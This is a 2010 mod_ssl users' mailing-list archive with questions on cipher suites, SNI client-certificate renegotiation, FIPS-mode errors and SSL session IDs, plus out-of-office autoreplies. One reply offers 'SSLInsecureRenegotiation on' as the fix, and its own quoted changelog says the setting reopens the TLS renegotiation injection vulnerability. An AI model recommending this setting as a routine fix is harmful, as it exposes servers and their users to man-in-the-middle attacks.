	for ; Wed, 17 Mar 2010 10:02:04 +0100
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 17 Mar 2010 10:01:57 +0100
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 03/17/2010 10:02:04 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Sat 13/03/10 and will not return until
Mon 22/03/10.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 25 19:56:21 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1194A14D88C; Thu, 25 Mar 2010 19:56:21 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.logicind.com (mail.logicind.com [66.240.254.121])
	by master.modssl.org (Postfix) with ESMTP id BF36E14D874
	for ; Thu, 25 Mar 2010 19:56:20 +0100 (CET)
Received: from mail.logicind.com (localhost.localdomain [127.0.0.1])
	by mail.logicind.com (Postfix) with ESMTP id 77F45148257
	for ; Thu, 25 Mar 2010 14:54:08 -0400 (EDT)
Received: from 216.83.163.132
        (SquirrelMail authenticated user spamaway@pfharlock.com)
        by mail.logicind.com with HTTP;
        Thu, 25 Mar 2010 14:54:08 -0400 (EDT)
Message-ID: <55212.216.83.163.132.1269543248.squirrel@mail.logicind.com>
Date: Thu, 25 Mar 2010 14:54:08 -0400 (EDT)
Subject: Apache 1.3.42 support
From: spamaway@pfharlock.com
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.5 [CVS]
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: spamaway@pfharlock.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, there was a previous post about an update to mod_ssl for Apache
1.3.42.  The reply was that not until OpenSSL 0.9.8m was released would
this happen (possibly happen).  0.9.8m has been out since February 25th. 
0.9.8n came out yesterday actually.  Is there any word on a new version of
mod_ssl for Apache 1.3.42?

Also, since there's no new version of mod_ssl just yet, can I use mod_ssl
2.8.31 with Apache 1.3.42?  Or is each release of mod_ssl only for a
specific version of Apache?

Thanks!  Rob.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 18:00:58 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DF8F414D9EB; Mon, 29 Mar 2010 18:00:58 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.17.8])
	by master.modssl.org (Postfix) with ESMTP id 7F1CD14D836
	for ; Mon, 29 Mar 2010 18:00:42 +0200 (CEST)
Received: from gate.ashpool.org (p509130ED.dip.t-dialin.net [80.145.48.237])
	by mrelayeu.kundenserver.de (node=mreu1) with ESMTP (Nemesis)
	id 0LqY9V-1NIq0X0u2r-00dxHl; Mon, 29 Mar 2010 17:58:24 +0200
Received: from spiral.localnet (spiral.ashpool.org [172.16.0.10])
	by gate.ashpool.org (Postfix) with ESMTP id 7ACED32585
	for ; Mon, 29 Mar 2010 17:58:22 +0200 (CEST)
From: Thomas 
To: modssl-users@modssl.org
Subject: mod_ssl and ephemeral keying
Date: Mon, 29 Mar 2010 17:58:20 +0200
User-Agent: KMail/1.13.1 (Linux/2.6.31.12-0.1-default; KDE/4.4.1; i686; ; )
MIME-Version: 1.0
Content-Type: Text/Plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Message-Id: <201003291758.20896.tom@electric-sheep.org>
X-Provags-ID: V01U2FsdGVkX19gUg9UZfNHMj4usg+rEOG01I3QTG1O1vwBtIX
 +SAzkjR8gy3oL5D0qdCXdsPycPxCO+GTa/AeYB24LpblqQyU1q
 UQteV/czKF9MAavNXAy5Q==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
regarding http://httpd.apache.org/docs/2.2/mod/mod_ssl.html
there seem to be different ways to enable ephemeral keying by using
SSLCipherSuite in the mod_ssl config.

If I specify kEDH for the kex algorithm, does it mean that the key
exchange is not integrity protected by using RSA/DSA (b/c the
description states "no cert.")?

So, if I want ephemeral keying with integrity protection, do I have
to use:
a.) SSLCipherSuite kDHr:kDHd:...
or
b.) SSLCipherSuite kEDH:EDH
or something else?


Thanks for your help.

Thomas



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 20:16:51 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 818C414D9E9; Mon, 29 Mar 2010 20:16:51 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from precioventa.com (precioventa.com [78.46.97.196])
	by master.modssl.org (Postfix) with ESMTP id 4499214D836
	for ; Mon, 29 Mar 2010 20:16:35 +0200 (CEST)
Received: from [192.168.0.6] ([192.168.0.6])
	(authenticated bits=0)
	by precioventa.com (8.14.3/8.14.3/host-001) with ESMTP id o2TIEE1i006005
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 29 Mar 2010 20:14:17 +0200
Subject: Client certificate do not work / renegociate
From: Developer 
To: modssl-users@modssl.org
Content-Type: text/plain; charset="UTF-8"
Date: Mon, 29 Mar 2010 20:14:13 +0200
Message-ID: <1269886453.21519.39.camel@athlon.precioventa.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.28.3 (2.28.3-1.fc12) 
Content-Transfer-Encoding: 7bit
X-Greylist: Sender succeeded SMTP AUTH authentication, not delayed by milter-greylist-3.0 (precioventa.com [192.168.0.1]); Mon, 29 Mar 2010 20:14:18 +0200 (CEST)
X-Scanned-By: MIMEDefang 2.68 on 192.168.0.1
X-Spam-Status: No, score=-0.7 required=11.0 tests=ALL_TRUSTED,AWL
	shortcircuit=no autolearn=ham version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on precioventa.com
X-Virus-Scanned: clamav-milter 0.95.3 at precioventa.com
X-Virus-Status: Clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Developer 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
In a host where client certificate is optional and in some directories
requirement. Server is SNI, and this configuration works fine before
SNI.

> 
> SSLVerifyClient optional
> 

> SSLVerifyClient require

...

I use SNI client (firefox) with client certificate that works on optional locations but do not in certrequirement location.


> [info] Initial (No.1) HTTPS request received for child 5 (server www.1pc.es:443)
> [debug] ssl_engine_kernel.c(487): [client 192.168.1.40] Changed client verification type will force renegotiation, referer: http:
> [info] [client 192.168.1.40] Requesting connection re-negotiation, referer: http://www.1pc.es/
> [debug] ssl_engine_kernel.c(724): [client 192.168.1.40] Performing full renegotiation: complete handshake protocol, referer: http
> [debug] ssl_engine_kernel.c(1861): OpenSSL: Handshake: start
> [debug] ssl_engine_kernel.c(1869): OpenSSL: Loop: SSL renegotiate ciphers
> [debug] ssl_engine_kernel.c(1869): OpenSSL: Loop: SSLv3 write hello request A
> [debug] ssl_engine_kernel.c(1869): OpenSSL: Loop: SSLv3 flush data
> [debug] ssl_engine_kernel.c(1869): OpenSSL: Loop: SSLv3 write hello request C
> [info] [client 192.168.1.40] Awaiting re-negotiation handshake, referer: http://www.1pc.es/
> [debug] ssl_engine_kernel.c(1861): OpenSSL: Handshake: start
> [debug] ssl_engine_kernel.c(1869): OpenSSL: Loop: before accept initialization
> [debug] ssl_engine_io.c(1873): OpenSSL: read 5/5 bytes from BIO#7f4325589ef0 [mem: 7f4325577083] (BIO dump follows)
> [debug] ssl_engine_kernel.c(1874): OpenSSL: Read: SSLv3 read client hello B
> [debug] ssl_engine_kernel.c(1893): OpenSSL: Exit: failed in SSLv3 read client hello B
> [error] [client 192.168.1.40] Re-negotiation handshake failed: Not accepted by client!?, referer: http://www.1pc.es/


> openssl-1.0.0-0.13.beta4.fc12.x86_64
> httpd-2.2.14-1.fc12.x86_64
> mod_ssl-2.2.14-1.fc12.x86_64


Anyone knows where is the problem?
Why do not work in required, and do the job in optional?


-- 
http://www.1pc.es/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 10:05:54 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8339514D885; Tue, 30 Mar 2010 10:05:54 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-fx0-f223.google.com (mail-fx0-f223.google.com [209.85.220.223])
	by master.modssl.org (Postfix) with ESMTP id C916714D838
	for ; Tue, 30 Mar 2010 10:05:36 +0200 (CEST)
Received: by fxm23 with SMTP id 23so34410fxm.1
        for ; Tue, 30 Mar 2010 01:03:24 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:in-reply-to:references
         :date:received:message-id:subject:from:to:content-type;
        bh=3ilLfQ7tm+crb6MPZ1ruPrXJZ2Y8axccvhjWztOkMUc=;
        b=NRQPosvnvKMZz1Yx27VroPz+tN6+4xzTo+sO5uTzwDGBqjGJvpxgFfQr2tXJNOZi74
         HCM4vhcTNS/+wnllSOFzdfotfjNKkV882u4mWlXGJOa5oheCQKi4rFjvKnPN+UMsydbO
         O33F78IaxrOs06YJKXBaaj3J14VmrYXS61hKI=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:in-reply-to:references:date:message-id:subject:from:to
         :content-type;
        b=FmaWvxj+WwGpcpe9cjYLSJ1DhPd8bcyPjUyi77LMDIg44BmVF+JFyZoJvMH0oOrmUB
         v1Aqg0CAsaGHSMXW29MEcVNmptJqiWwWdvaaua4GMXmY971XAqXHP17N4rcLsESlW0Jv
         fLFL8MmTPISwPSTPrm03+U8EYtOipM4PMUBME=
MIME-Version: 1.0
Received: by 10.103.171.11 with HTTP; Tue, 30 Mar 2010 01:03:23 -0700 (PDT)
In-Reply-To: <1269886453.21519.39.camel@athlon.precioventa.com>
References: <1269886453.21519.39.camel@athlon.precioventa.com>
Date: Tue, 30 Mar 2010 10:03:23 +0200
Received: by 10.102.182.18 with SMTP id e18mr3344794muf.85.1269936204143; Tue, 
	30 Mar 2010 01:03:24 -0700 (PDT)
Message-ID: 
Subject: Re: Client certificate do not work / renegociate
From: Mario Brandt 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mario Brandt 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
That is not a bug, it is a feature! With the TLS renegotiation there
is a theoretical man-in-the-middle-attack possible. To prevent that
the developers decided to deactivate the TLS renegotiation.

Solution: use SSLInsecureRenegotiation on


http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslinsecurerenegotiation


>From the changelog:
Comprehensive fix of the TLS renegotiation prefix injection attack
when compiled against OpenSSL version 0.9.8m or later. Introduces the
'SSLInsecureRenegotiation' directive to reopen this vulnerability and
offer unsafe legacy renegotiation with clients which do not yet
support the new secure renegotiation protocol.



Mario
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 29 22:11:57 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4ABB614D884; Thu, 29 Apr 2010 22:11:57 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from blu0-omc3-s12.blu0.hotmail.com (blu0-omc3-s12.blu0.hotmail.com [65.55.116.87])
	by master.modssl.org (Postfix) with ESMTP id C4FEF14D839
	for ; Thu, 29 Apr 2010 22:11:40 +0200 (CEST)
Received: from BLU148-W31 ([65.55.116.73]) by blu0-omc3-s12.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
	 Thu, 29 Apr 2010 13:09:25 -0700
Message-ID: 
Content-Type: multipart/alternative;
	boundary="_ff3985b3-1508-4ad6-a470-ef39037ec9a3_"
X-Originating-IP: [129.6.84.222]
From: Keith Theman 
To: 
Subject: Skipping generating temporary 512 bit RSA private key in FIPS mode
Date: Thu, 29 Apr 2010 16:09:25 -0400
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 29 Apr 2010 20:09:25.0967 (UTC) FILETIME=[DDDC55F0:01CAE7D7]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Keith Theman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--_ff3985b3-1508-4ad6-a470-ef39037ec9a3_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


How do I get rid of these errors?=20

FIPS Openssl 1.2

[Thu Apr 29 15:41:22 2010] [notice] Operating in SSL FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 =
bit RSA private key in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 =
bit DH parameters in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 =
bit RSA private key in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 =
bit DH parameters in FIPS mode
[Thu Apr 29 15:41:22 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 Ope=
nSSL/FIPS DAV/2 SVN/1.6.11 configured -- resuming normal operations

 		 	   		 =20
_________________________________________________________________
The New Busy is not the old busy. Search=2C chat and e-mail from your inbox=
.
http://www.windowslive.com/campaign/thenewbusy?ocid=3DPID28326::T:WLMTAGL:O=
N:WL:en-US:WM_HMP:042010_3=

--_ff3985b3-1508-4ad6-a470-ef39037ec9a3_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






How do I get rid of these errors? 

FIPS Openssl 1.2

[Thu Apr =
29 15:41:22 2010] [notice] Operating in SSL FIPS mode
[Thu Apr 29 15:41:=
22 2010] [error] Init: Skipping generating temporary 512 bit RSA private ke=
y in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generat=
ing temporary 512 bit DH parameters in FIPS mode
[Thu Apr 29 15:41:22 20=
10] [error] Init: Skipping generating temporary 512 bit RSA private key in =
FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating t=
emporary 512 bit DH parameters in FIPS mode
[Thu Apr 29 15:41:22 2010] [=
notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/FIPS DAV/2 SVN/1.6.11 c=
onfigured -- resuming normal operations

 		 	   		  
The =
New Busy is not the old busy. Search=2C chat and e-mail from your inbox. Get started.
=

--_ff3985b3-1508-4ad6-a470-ef39037ec9a3_--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 30 19:53:03 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BD8FA14D8A3; Fri, 30 Apr 2010 19:53:03 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web111416.mail.gq1.yahoo.com (web111416.mail.gq1.yahoo.com [67.195.15.222])
	by master.modssl.org (Postfix) with SMTP id 0171B14D836
	for ; Fri, 30 Apr 2010 19:52:45 +0200 (CEST)
Received: (qmail 6109 invoked by uid 60001); 30 Apr 2010 17:50:30 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1272649830; bh=DKb9y/sw0+A3ipp+u4DNgQO5ed8wBTKBFyWmF2nU/wI=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=Z8TjszyBUJgsTjijCQAuXC6j/9Vi6M3TLVAYJYSKGBmBxOQ4K0QFclQw7+DeK3FnWXeoVpbG4SpspqxqspQpHiKJUizCB1ny+tOoKr6avGfkirCip2ef87dVXR1H7iO+ACQjGav9IchAolbpmyMM2UYd6xltDZbQfqAgRQCIz+o=
DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type;
  b=ywtVRet44PDhoV/N48s5K9f/jFnOawPQzntLc78iGrPbjNYT85KBOE+eLzW36dcxLrHZIsCB9snSqjiuGJm/vm0erLlQrImLDZpmeuRRkliv1amJFieywjxIAd5T/M3v23EdXWcMsdkqs1TxqOc1XJMT8EUMjVCpAnzAZM3ruUo=;
Message-ID: <332707.383.qm@web111416.mail.gq1.yahoo.com>
X-YMail-OSG: fqT4iIQVM1mPUmxfFUF37bFEtG.H2Ims78KyC.mpHQYRl2a
 KTR1P7z0ciI3vyb6gMTVlU1YszswrfQFyWNni9NneX1wkWK6P_b_0eqgkr22
 .5uYUbsQ8OMrpE_Q_EMgEskYN5ylSONiVc_4jOhWhvd62DBuPU6qqAksWx9v
 SmxBcDCD9M0SGXeXaFHK63fyYtQAc5ItvrSG5zuUdMKLK1Eu.276si4jfvPL
 53QPbsW3v4WdkAfPEVyT3fh2NBB8IGBpFQaTaZZ33Oax_fqH4ztXdWmhtpWg
 iDiUMWpg-
Received: from [129.6.84.222] by web111416.mail.gq1.yahoo.com via HTTP; Fri, 30 Apr 2010 10:50:30 PDT
X-Mailer: YahooMailRC/348.5 YahooMailWebService/0.8.102.267879
Date: Fri, 30 Apr 2010 10:50:30 -0700 (PDT)
From: Ed snooper 
Subject: ???? Skipping generating temporary 512 bit RSA private key in FIPS mode
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1423182264-1272649830=:383"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed snooper 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1423182264-1272649830=:383
Content-Type: text/plain; charset=us-ascii


 
 
   

 How do I get rid of these errors? 

FIPS Openssl 1.2

[Thu 
Apr 29 15:41:22 2010] [notice] Operating in SSL FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 bit RSA 
private key in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: 
Skipping generating temporary 512 bit DH parameters in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 
bit RSA private key in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] 
Init: Skipping generating temporary 512 bit DH parameters in FIPS mode
[Thu Apr 29 15:41:22 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 
OpenSSL/FIPS DAV/2 SVN/1.6.11 configured -- resuming normal operations


      
--0-1423182264-1272649830=:383
Content-Type: text/html; charset=us-ascii




        

    





    










    




    








How do I get rid of these errors? 

FIPS Openssl 1.2

[Thu 
Apr 29 15:41:22 2010] [notice] Operating in SSL FIPS mode
[Thu Apr 29
 15:41:22 2010] [error] Init: Skipping generating temporary 512 bit RSA 
private key in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] Init: 
Skipping generating temporary 512 bit DH parameters in FIPS mode
[Thu
 Apr 29 15:41:22 2010] [error] Init: Skipping generating temporary 512 
bit RSA private key in FIPS mode
[Thu Apr 29 15:41:22 2010] [error] 
Init: Skipping generating temporary 512 bit DH parameters in FIPS mode
[Thu

 Apr 29 15:41:22 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 
OpenSSL/FIPS DAV/2 SVN/1.6.11 configured -- resuming normal operations









      
--0-1423182264-1272649830=:383--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  4 20:39:35 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5683414DA29; Tue,  4 May 2010 20:39:35 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-fx0-f54.google.com (mail-fx0-f54.google.com [209.85.161.54])
	by master.modssl.org (Postfix) with ESMTP id 2B38414D839
	for ; Tue,  4 May 2010 20:39:19 +0200 (CEST)
Received: by fxm15 with SMTP id 15so3953543fxm.13
        for ; Tue, 04 May 2010 11:37:04 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:mime-version:received:in-reply-to
         :references:from:date:message-id:subject:to:content-type
         :content-transfer-encoding;
        bh=8QV9aaIvcDqTLBzJE6qvzrDBNyfpSj3KsP48krmhiuk=;
        b=QtPNOoA+4hHdsYjF0Ia39PtHPdcr6G3C/Fwk6Zxm84zZHFxSNnaq9S4sjk+595gVJV
         0GzrtIRrM3IBlzNQFSzvj1jYH9VZAGRgayD7IEOPdg2z371wao4gUAcASE1YGRskxuYC
         C6ez3bu+zxXpDT1BPYoBA6je/suYk678xg5uo=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:in-reply-to:references:from:date:message-id:subject:to
         :content-type:content-transfer-encoding;
        b=V0kN9aeeehg7EFImhIcQXqj/e7Egl4+mD48aau/sC2Gz1nleE+UWSVpP6U4+ikADNi
         QJcFzEZSzuxgQBNpqxHEn0hVzOAKWVozjqEo4Wgs85OlwvqpLcuufbAaFkAPPSDYxKFU
         fDlLYRy8qeOK/3sSOEy3am7kevLWID0UGwBls=
Received: by 10.102.16.19 with SMTP id 19mr10219075mup.111.1272998224147; Tue, 
	04 May 2010 11:37:04 -0700 (PDT)
MIME-Version: 1.0
Received: by 10.102.228.10 with HTTP; Tue, 4 May 2010 11:36:44 -0700 (PDT)
In-Reply-To: 
References: 
From: Klaubert Herr da Silveira 
Date: Tue, 4 May 2010 15:36:44 -0300
Message-ID: 
Subject: SSL Session ID chaining
To: modssl-users@modssl.org
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Klaubert Herr da Silveira 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

I recently found a patch for mod_ssl trunk
(http://svn.apache.org/viewvc?view=3Drevision&revision=3D779005) and it is
in 2.3.5-alpha the SSL_SESSION_RESUMED, that is "Initial or Resumed
SSL Session. Note: multiple requests may be served over the same
(Initial or Resumed) SSL session if HTTP KeepAlive is in use". However
it show the 1st request as "Initial", and "resumed" on nexts requests
inside the same SSL_SESSION_ID (sometimes it show other "Initial" in
the same SSL_SESSION_ID, maybe because are in other tcp connection).

I had a situation were I make a client certificate authentication and
I need to know how to get if a SSL_SESSION_ID is the first and the
others are renegotiated (assuming a 5min. timeout), in a way showed
bellow:

Timestamp :SSL_SESSION_ID : Status
00:00:00    : AAAAAA              : Initial
00:05:00    : BBBBBB =A0            : Renegotiated
00:10:00    : CCCCCC              : Renegotiated
00:15:00    : DDDDDD              : Renegotiated
00:20:00    : EEEEEE              : Renegotiated

I can't find a way to make a relatioship between the SSL_SESSION_ID's,
how can I get this?


Best regards,

Klaubert Herr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 10 15:53:46 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3395114DA25; Mon, 10 May 2010 15:53:46 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id C0B3814D838
	for ; Mon, 10 May 2010 15:53:29 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 503A24E0C0
	for ; Mon, 10 May 2010 15:51:14 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv1.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id Ds0OsXeW7XeE for ;
	Mon, 10 May 2010 15:51:12 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 3CFC74E0BB
	for ; Mon, 10 May 2010 15:51:11 +0200 (CEST)
Message-ID: <4BE80F4D.2020804@stroeder.com>
Date: Mon, 10 May 2010 15:51:09 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.10) Gecko/20100504 Lightning/1.0b1 SeaMonkey/2.0.5
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL_SESSION_ID on RHEL 5.5
X-Enigmail-Version: 1.0.1
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

HI!

For security reasons I'm using env var SSL_SESSION_ID to cross-check the
application's session ID with the SSL session ID in my web application. This
works without any issues on my openSUSE boxes. Browser is Seamonkey 2.0.4.

But I have problems with Apache 2.2.3 shipped with
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
Cery soon the SSL session seems to be renegotiated resulting in a new value in
SSL_SESSION_ID

Relevant settings for SSL session resumptions:

SSLSessionCache         shmcb:/var/cache/mod_ssl/scache(512000)
SSLSessionCacheTimeout  7200

Any hint? Were there relevant fixes to mod_ssl after release 2.2.3? Or maybe
Red Hat backported patches against renegotiation attacks which cause the issue?

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 10 16:04:15 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C54314D88F; Mon, 10 May 2010 16:04:15 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id C7D8114D838
	for ; Mon, 10 May 2010 16:03:55 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id o4AE1dKl002986
	for ; Mon, 10 May 2010 16:01:39 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Mon, 10 May 2010 16:01:32 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 05/10/2010 04:01:39 PM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Sat 08/05/10 and will not return until
Mon 17/05/10.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 10 17:06:56 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
